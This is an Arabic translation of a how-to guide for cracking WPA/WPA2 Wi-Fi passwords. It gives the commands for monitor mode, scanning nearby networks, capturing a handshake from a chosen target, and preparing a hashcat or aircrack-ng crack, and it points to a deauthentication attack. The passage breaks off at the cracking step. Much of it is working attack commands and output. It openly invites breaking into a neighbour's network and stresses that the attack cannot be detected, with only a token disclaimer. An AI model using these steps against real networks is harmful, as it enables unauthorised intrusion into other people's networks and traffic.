
اختراق أجهزة توجيه Wi-Fi WPA/WPA2 باستخدام Airodump-ng و Aircrack-ng/Hashcat
اختراق أجهزة التوجيه (الراوترات) التي تعمل ببروتوكول WPA/WPA2 باستخدام Airodump-ng و Aircrack-ng/Hashcat.
هذا دليل إرشادي موجز يوضح كيفية اختراق شبكات Wi-Fi المحمية بكلمات مرور ضعيفة. إنه ليس شاملاً، لكنه ينبغي أن يوفر معلومات كافية لك لاختبار أمان شبكتك الخاصة أو اقتحام شبكة قريبة. الهجوم الموضح أدناه هو هجوم سلبي بالكامل (استماع فقط، لا يتم بث أي شيء من حاسوبك) ومن المستحيل اكتشافه بشرط ألا تستخدم كلمة المرور التي تخترقها. يمكن استخدام هجوم إلغاء المصادقة النشط الاختياري لتسريع عملية الاستطلاع، وهو موضح في نهاية هذا المستند.
إذا كنت على دراية بهذه العملية، يمكنك تخطي الشروحات والانتقال إلى قائمة الأوامر المستخدمة في الأسفل. للحصول على مجموعة من الاقتراحات والطرق البديلة، راجع الملحق. قام كل من neal1991 و tiiime بتقديم ترجمات لهذا المستند و الملحق باللغة الصينية إذا كنت تفضل تلك النسخ.
إخلاء مسؤولية: هذا البرنامج/الدليل هو لأغراض تعليمية فقط. لا ينبغي استخدامه في أنشطة غير قانونية. المؤلف غير مسؤول عن استخدامه. لا تكن وغداً.
يفترض هذا الدليل أنك:
sudo apt-get install aircrack-ngابدأ بإدراج الواجهات اللاسلكية التي تدعم وضع المراقبة باستخدام:
airmon-ng
إذا لم ترَ واجهة مدرجة، فإن بطاقتك اللاسلكية لا تدعم وضع المراقبة 😞
سنفترض أن اسم واجهتك اللاسلكية هو wlan0 لكن تأكد من استخدام الاسم الصحيح إذا كان مختلفاً عن هذا. بعد ذلك، سنضع الواجهة في وضع المراقبة:
airmon-ng start wlan0
قم بتشغيل iwconfig. يجب أن ترى الآن واجهة وضع مراقبة جديدة مدرجة (على الأرجح mon0 أو wlan0mon).
ابدأ الاستماع إلى إطارات Beacon 802.11 التي تبثها أجهزة التوجيه اللاسلكية القريبة باستخدام واجهة المراقبة الخاصة بك:
airodump-ng mon0
يجب أن ترى مخرجات مشابهة لما يلي.
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme
00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome
06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2
78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2
9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT
BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root
EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca
لأغراض هذا العرض التوضيحي، سنختار اختراق كلمة مرور شبكتي "hackme". احفظ عنوان BSSID MAC ورقم القناة (CH) كما يظهره airodump-ng، لأننا سنحتاجهما في الخطوة التالية.
يستخدم WPA/WPA2 مصافحة رباعية لمصادقة الأجهزة على الشبكة. ليس عليك معرفة أي شيء عن معنى ذلك، لكن يجب عليك التقاط إحدى هذه المصافحات لكسر كلمة مرور الشبكة. تحدث هذه المصافحات عندما يتصل جهاز بالشبكة، على سبيل المثال، عندما يعود جارك من العمل إلى المنزل. نلتقط هذه المصافحة بتوجيه airmon-ng لمراقبة حركة المرور على الشبكة المستهدفة باستخدام قيم القناة و bssid التي تم اكتشافها من الأمر السابق.
# استبدل قيم -c و --bssid بقيم شبكتك المستهدفة
# -w تحدد الدليل حيث سنحفظ التقاط الحزم
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
الآن ننتظر... بمجرد التقاط مصافحة، يجب أن ترى شيئاً مثل [ WPA handshake: bc:d3:c9:ef:d2:67 في أعلى يمين الشاشة، مباشرة على يمين الوقت الحالي.
إذا كنت تشعر بنفاد الصبر، وتشعر بالراحة تجاه استخدام هجوم نشط، يمكنك إجبار الأجهزة المتصلة بالشبكة المستهدفة على إعادة الاتصال، عن طريق إرسال حزم إلغاء مصادقة خبيثة إليها. يؤدي هذا غالباً إلى التقاط مصافحة رباعية. راجع قسم هجوم إلغاء المصادقة أدناه للحصول على معلومات حول هذا.
بمجرد التقاط المصافحة، اضغط ctrl-c للخروج من airodump-ng. يجب أن ترى ملف .cap حيثما أخبرت airodump-ng بحفظ الالتقاط (غالباً ما يسمى -01.cap). سنستخدم ملف الالتقاط هذا لاختراق كلمة مرور الشبكة. أحب إعادة تسمية هذا الملف ليعكس اسم الشبكة التي نحاول اختراقها:
mv ./-01.cap hackme.cap
الخطوة الأخيرة هي اختراق كلمة المرور باستخدام المصافحة التي تم التقاطها. إذا كان لديك إمكانية الوصول إلى وحدة معالجة رسوميات (GPU)، فإنني أوصي بشدة باستخدام hashcat لاختراق كلمة المرور. لقد أنشأت أداة بسيطة تجعل استخدام hashcat سهلاً للغاية تسمى naive-hashcat. إذا لم يكن لديك إمكانية الوصول إلى GPU، فهناك العديد من خدمات اختراق GPU عبر الإنترنت التي يمكنك استخدامها، مثل GPUHASH.me أو OnlineHashCrack. يمكنك أيضاً تجربة اختراق باستخدام وحدة المعالجة المركزية (CPU) باستخدام Aircrack-ng.
ضع في اعتبارك أن كلتا طريقتي الهجوم أدناه تفترضان كلمة مرور ضعيفة نسبياً يولدها المستخدم. تأتي معظم أجهزة التوجيه WPA/WPA2 بكلمات مرور عشوائية قوية مكونة من 12 حرفاً يتركها العديد من المستخدمين (بحق) دون تغيير. إذا كنت تحاول اختراق إحدى كلمات المرور هذه، فإنني أوصي باستخدام ملفات قاموس Probable-Wordlists WPA-length.
naive-hashcat (موصى به)